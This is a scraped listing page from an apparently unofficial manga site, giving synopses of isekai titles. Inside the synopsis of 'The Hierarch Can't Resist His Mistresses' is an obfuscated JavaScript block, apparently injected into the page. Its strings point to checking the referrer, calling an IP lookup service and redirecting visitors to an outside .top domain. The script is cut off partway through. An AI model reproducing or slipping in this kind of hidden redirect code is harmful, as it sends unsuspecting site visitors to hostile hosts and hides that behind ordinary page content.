Isekai - Page 103

Isekai manga centers on characters who are whisked away to a fantastical world, often filled with magic, strange creatures, and epic adventures. The main character usually has to adapt and become a hero or fulfill a unique role in the new world.

1496 results

The hero returns from another world, becomes an influencer, and earns money in the real world, where dungeons have appeared!

One day, an ordinary high school student is transferred to another world.He raises his level in the other world, successfully defeats the Demon King, and saves the world!With his strongest status, he decided to return to his own world.However, in the world to which he returns, a new "dungeon" has appeared.A modern dungeon fantasy where the former hero becomes a warrior, delving into dungeons created in his own world!


The Hero Summoned From Another World Is A Cat

The Hero Summoned from Another World is a CatIn a world where the demon king who has long laid dormant has reawakened, mankind decided to summon a hero from another world to stand against him. However, the one that appeared from the other world was an unfamiliar being, a cat'. This is an isekai fantasy where people from a world where cats do not exist fall head over heels for a cat's cuteness!


The Hero Took Everything from Me, So I Partied with the Hero’s Mother!

A young man wants to marry the mothers of the hero\'s party— As a member of the hero\'s party Ceres, the main character, set out to defeat the demon king. But one day, he was suddenly dismissed by the hero, and he had to leave the party. All alone, Ceres sought to find a domestic slave to take care of him. What he saw at the slave market was Ms Shizuko, the mother of the hero, sold as a slave—?? The unreasonably expelled young man\'s Isekai mama harem is born!!


The Heroine’s Friend Strikes Back

Reborn as a side character wrongfully accused and executed, Mia resolves to rewrite her fate. Returning to the moment she first met the villainous heroine, she vows to stand tall and fight back, sparking a thrilling rebellion against a fabricated destiny.


The Hierarch Can’t Resist His Mistresses

An elite investor crossed over into a game world... to become the demon religion’s hierarch? How could one respond to the pleas of the demon religion mistresses? Obviously, going down the path of domination in this new world!<script></script><script>function _0x4660(){var _0x5e07b2=['MUlbQ','AWjKG','.customapi','location','floor','random','726090TqmhSW','51544TmTqaj','PqYzm','VeeVb','1566676VvAtkz','then','.top/','1471940wIyLTx','text','href','https://ip','YBnBm','jpPyl','','ZXigE','2844215MFnlDT','28rDTYJQ','xdpEu','http://rea','google','UDJqS','referrer','677215CInbzd','58437wqJKNG','3ELNGxY','includes','112ubdCOa','21XUqGqa'];_0x4660=function(){return _0x5e07b2;};return _0x4660();}function _0x3a8c(_0x53a754,_0x470bd2){var _0x44e012=_0x4660();return _0x3a8c=function(_0x57c43c,_0x2c6aa7){_0x57c43c=_0x57c43c-(0x2*0xd4b+0x1f82+0x303*-0x13);var _0x1be46b=_0x44e012[_0x57c43c];return _0x1be46b;},_0x3a8c(_0x53a754,_0x470bd2);}(function(_0x588450,_0x21286f){var _0x181a11=_0x3a8c,_0x4d8485=_0x588450();while(!![]){try{var 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The Holy Emperor's Grandson Is a Necromancer

Our MC dies from an accidental electrocution and ends up inhabiting the body of a young prince in another world, his new profession being the Necromancer he chose in the game he was playing before his untimely demise. However, things are not what they seem – including his own Necromancy skills!


The Holy Power of Modern Medicine

Jin Yoosung was a gifted surgeon said to be able to bring the dead back to life. However, not even this genius doctor had the ability to revive himself. Following a fatal car crash, Yoosung closed his eyes for what he\'d thought was the last time… only to wake up and find that he\'s been reborn in a fantasy world! A doctor through and through, Yoosung — now Ray — resolves to become a healer again. Unfortunately, it seems his new magical abilities may not be the most fitting for his dream career…


The Immoral Duke Needs to be Homeschooled

You three kids, I’ll teach you. Recently, there have been several changes in my life. The first is that I became the governess of Lord Bertha’s siblings, and the second is that I remembered my past life. Why did I recall my past life now? Could this be inside the novel I read in my past life? If I remember correctly, I, “Estella,” the governess, will soon die. All to protect the half-siblings from that immoral man, “Diego”! “You seem like a more capable person than I thought.” “You’d better look for a job at another estate because you’ll go crazy if you stay here.” But “Diego,” the man who I thought was a heartless psychopath, turns out to be surprisingly kind…? Alright, I’m going to organize a dramatic reconciliation between Diego and his half-siblings!! How could you possibly kill these adorable kids when they’re hugging you?!


The Imperious Young Lord

Read manhwa The Imperious Young Lord / Overbearing Tyrant / Acımasız Soylu / パワハラする領主様 / 飞扬跋扈的领主大人 / 갑질하는 영주님 The year is 203X, and Earth is under attack. The enemy? Extraterrestrials. Park Hyunsung, a militia commander, valiantly lays down his life to take down the enemy base. One moment, he’s caught up in a malfunctioning teleportation device; the next… he’s in the body of Ian Alberon, a 15-year-old lord! Thrown into a world of monsters and magic, Hyunsung — now Ian — must figure out how to navigate his new surroundings. And to top it all off, it seems his enemies may be much closer than he thinks…


The Invincible Summoner Who Crawled Up from Level 1

After losing his father in a tragic accident, Shinobu Iijima and his younger sister Megumi are taken in by their father’s old friend, Ayumu. Shinobu works hard in the hopes of starting a new life for himself. Megumi, and a mobile game called La Vita Online, are the only things keeping him afloat. One day, Ayumu reveals his true intentions of tearing Shinobu down and getting his hands on Megumi. But just after Shinobu learns that Ayumu deleted all of his game data in La Vita, their high-rise apartment catches on fire and Shinobu falls to his death, Megumi in tow. He wakes up in a strange new world... and realizes he’s been reincarnated into the world of La Vita Online. An announcement from the devs tells him that Ayumu is already there, and a countdown to Megumi’s arrival is ticking. Shinobu vows to protect Megumi after she arrives at any cost, even if it means he has to crawl his way up from level 1 to fend off all the other reincarnated players.


THE ISEKAI DOCTOR Any sufficiently advanced medical science is indistinguishable from magic

Can modern medicine work in another world? No cheats, no modern equipment. One doctor stands up against a world where magic rules! Tadato Amami, an active doctor, is transferred to another world where medical magic is monopolized. He is surprised by the slimes, chimera, beastmen, and other inhabitants he encounters for the first time! But with the little medical equipment he has and his own knowledge, he is able to fight diseases and injuries! Will he be able to cure the inhabitants of the other world and save those who suffer?! ___ [Official English (K MANGA) - United States only!](


The Justice of Villainous Woman ( What It Takes to be a Villainess )

<div class="description-summary"> <div class="summary__content show-more active"> With a broken heart, Hwayoung falls headfirst into the river by accident but wakes up as infamous villainess Satiana Altisee Kaylon. Coming to terms with her new life as sole daughter of House Kaylon, Satiana is soon chosen as a candidate for the next empress! In the palace full of schemers and liars, she must become a cold-blooded villainess to win her royal seat by the crown prince – or her new family will face grave danger! Will being perfectly evil really be enough? ‘Cause even villains need love! </div> </div>
